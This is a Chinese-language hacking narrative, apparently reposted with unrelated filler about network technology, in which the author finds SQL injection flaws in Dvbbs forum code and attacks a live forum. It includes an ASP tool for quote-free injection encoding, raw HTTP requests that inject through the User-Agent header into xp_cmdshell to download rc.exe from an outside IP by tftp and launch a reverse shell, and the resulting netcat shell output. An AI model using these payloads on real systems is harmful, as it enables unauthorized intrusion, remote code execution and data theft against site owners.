|
導讀網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據... 網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 內容: Hacking/Cracking的道路總是艱辛的…… 常常看到的文章是寫某人多么牛逼,一路視各種障礙如草芥,勢如破竹的攻破某臺服務器,我一直懷疑這是小說的手法,因為我在做的時候總是磕磕碰碰,簡單問題都會弄很久,這不,比如對bbs.xxxxxxxx.com的攻擊就是。 接到這個任務是什么時候我都忘了,反正有一天南陽巖冰叫我看看他的論壇,我稀里糊涂的就答應下來,但是隔了好多天才想到要去看看。那天過去一看,哈哈,很眼熟的論壇嘛,就是叫什么名字我忘了,厚著臉皮在QQ上問了一下,才知道是大名鼎鼎的動網論壇,呵呵,怪不得滿地都是。 然后我到網上去找動網論壇的漏洞文章,找到后我又突然懶得去看了,就算有人家也補上了吧,看了也白搭,不如省下點時間作畢設。 又過了幾天,論文實在是寫不下去,于是去網上下了一個動網的最新版的論壇來看代碼,看啊看的就睡著了…… 醒過來的時候,口水把鍵盤都弄濕掉了,管理員說宿舍要消毒,又叫我們快走,匆匆忙忙的只好拷到優盤帶到學校朋友的機器上去看。在學校折騰了一個多小時,終于眼睛一亮,bbseven.asp中有這么一段: if request("act")="刪除" then if request.form("lid")="" then founderr=true Errmsg=Errmsg+" "+"<li>請指定相關事件。" else lid=replace(request.Form("lid"),"‘","") end if end if if founderr then exit sub if request("act")="刪除" then conn.execute("delete from log where l_id in ("&lid&")") 當時我的心律就到了120,我不知道lid是xxxx);drop table admin;--時是怎樣,上面那個replace是不是太輕率?馬上我就想到可以給自己的論文里面加500字以上了(剛好我的論文也有關于SQL Injection的部分),于是我就在論文里面添了一段SQL Injection Without Quotation Mark,并在接下來的兩天內好好的研究了一下。嗯,結果做了一個小的.asp,貼出來看看啊,反正大概的意思就是比如‘AB‘完全可以用char(65)+char(66)表示,大家有意見發到n.e.v.e.r@tom.com給我好了。 ======================= Cut Here ======================= <html> <body bgcolor=black> <font size=2 color=#ff7777>填上SQL語句!</font> <FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> <input type=text name="in" size=45 value="" style="color:#0099FF;BORDER-BOTTOM: #0099FF 1px solid; BORDER-LEFT: #0099FF 1px solid; BORDER-RIGHT: #0099FF 1px solid; BORDER-TOP: #0099FF 1px solid; FONT-SIZE: 9pt;BACKGROUND-COLOR: #000000"> <input type=submit value="Encode!" style="FONT-SIZE: 9pt;BORDER-RIGHT: 0px solid; BORDER-TOP: 0px solid; BORDER-LEFT: 0px solid; BORDER-BOTTOM: 0px solid; BACKGROUND-COLOR:#0099FF;COLOR:#ff0000;"> </FORM> <font color=#0099ff> <% LINK_CHAR = "+" ‘字符串連接符號是+嗎? strIn=Request("in") strIn = strIn & "--" strTemp = split(strIn,"‘") i = 0 ‘On Error Resume Next Do while NOT IsNull(strTemp(i)) If InStr(strTemp(i),"--") Then Exit Do End if i = i + 2 Loop ‘response.write i For j = 0 To i - 1 Step 2 strOut = strOut & strTemp(j) For k = 0 To len(strTemp(j+1))-1 strOut = strOut & "char(" & asc(left(right(strTemp(j+1),len(strTemp(j+1))-k),1))&")" & LINK_CHAR Next strOut = left(strOut, len(strOut)-len(LINK_CHAR)) Next If InStr(strTemp(i), "--")<>0 Then strOut = strOut & left(strTemp(i), InStr(strTemp(i), "--") - 1) End if response.write strOut %> ======================= Cut Here ======================= 我不知道我找的這個地方是不是確實是漏洞,因為沒有辦法去測試,我總不能去求南陽巖冰給我一個管理員權限來刪日志吧,那還不如直接要計算機的賬號好了。總之就是磨蹭了這么久,只給我的論文加了633個字而已。 還是不甘心,于是又繼續作論文,做到再一次做不下去時,又來看代碼。 呵呵,又給我找到有問題的地方了,char.asp中有這么一段話: sql="ShowHOT_COM_inst_online_char 2,"&statuserid&",‘"&membername&"‘,‘"&memberclass&"‘,‘"&Request.ServerVariables("REMOTE_HOST")&"‘,"&boardid&",‘"&Request.ServerVariables("HTTP_USER_AGENT")&"‘,‘"&replace(stats,"‘","")&"‘,‘"&Request.ServerVariables("HTTP_X_FORWARDED_FOR")&"‘,"&UserGroupID&",‘"&actCome&"‘,"&userhidden&","&userid&"" Request.ServerVariables("HTTP_USER_AGENT")之類的是用戶瀏覽器提交的,不見得老老實實的就是IE啊什么。動網的那些人該不是把這個留作后門的吧? 我用F3搜索包含這段后門代碼的函數activeonline(),找到了很多,我選了一個boardhelp.asp來測試。為了調試方便,我改了一下char.asp,添加了一些輸出,當然,是inc目錄下面的char.asp,另外的char.asp都是騙人的。 測試成功后我馬上撥號上網(測試成功已經是好幾個小時后的事情了),告訴南陽巖冰有問題然后建了一張表,留言后就下網了。 等了兩天都沒有反應,我想還是進去看看吧,我就再次撥號上網,這次不是建表這么簡單了,我要得到最高權限才罷休。我設計好了一整套方案,先修改管理員的密碼,再登陸上傳文件,得到shell后提升權限,哈哈,是不是很完美啊? 我覺得人要樂觀一點,于是我想先試試MSSQL存儲過程能不能調用,下面是簡單的過程,簡直是異乎尋常的順利啊。嗯,十八歲以下的小朋友就不要看了,免得犯罪。 NC到bbs.xxxxxxxx.com的80口,提交如下的請求 GET /boardhelp.asp HTTP/1.1 Accept: */* Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: 1‘,‘1‘,‘1‘,2,‘c‘,1);exec master.dbo.xp_cmdshell ‘tftp -i 61.155.251.70 get rc.exe‘;-- Host: bbs.xxxxxxxx.com Connection: Keep-Alive Cookie: iscookies=0; ASPSESSIONIDGGQGQTDQ=IILFJNDALPMLEMDLCKKFFMJG 我開了TFTP服務的,我想成功的話它會從我的機器上下載一個rc.exe,這是我寫的一個小東西,不會被查殺的。然后我斷線再撥(因為如果BBS在Online表中查到了你的IP的話,就不會執行到有問題的那一句了),在本機監聽1102端口,再次連接到bbs.xxxxxxxx.com,提交 GET /boardhelp.asp HTTP/1.1 Accept: */* Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: 1‘,‘1‘,‘1‘,2,‘c‘,1);exec master.dbo.xp_cmdshell ‘rc.exe 61.155.250.193 1102‘;-- Host: bbs.xxxxxxxx.com Connection: Keep-Alive Cookie: iscookies=0; ASPSESSIONIDGGQGQTDQ=IILFJNDALPMLEMDLCKKFFMJG NC開始反應了,呵呵 D:hack>nc -l -p 1102 The shell is now! Microsoft Windows 2000 [Version 5.00.2195] (C) 版權所有 1985-2000 Microsoft Corp. C:WINNTsystem32>ipconfig /all ipconfig /all Windows 2000 IP Configuration Host Name . . . . . . . . . . . . : dns Primary DNS Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Broadcast IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter 本地連接: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : HP 10/100TX PCI Ethernet Driver Physical Address. . . . . . . . . : 00-30-6E-36-57-AA DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : ★.★.★.★ Subnet Mask . . . . . . . . . . . : ★.★.★.★ Default Gateway . . . . . . . . . : ★.★.★.★ DNS Servers . . . . . . . . . . . : ★.★.★.★ ★.★.★.★ 哇哈哈哈……我剛要進一步動作,結果突然上網卡沒錢斷掉了,看來我天生命就不該做壞事,shit! 嗯,到這里基本上是順利的攻破了吧。其實實際的情況是很慘不忍睹的,我前后撥號上網十幾次,中間斷線,打錯字符,還有之前的安裝MSSQL失敗,IIS出問題,斷電,看錯代碼空高興十幾秒鐘等等等等。不過寫的時候還是只把主要的過程寫出來,要是要去寫整個過程的話,估計一篇長篇敘事小說就會誕生了。 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!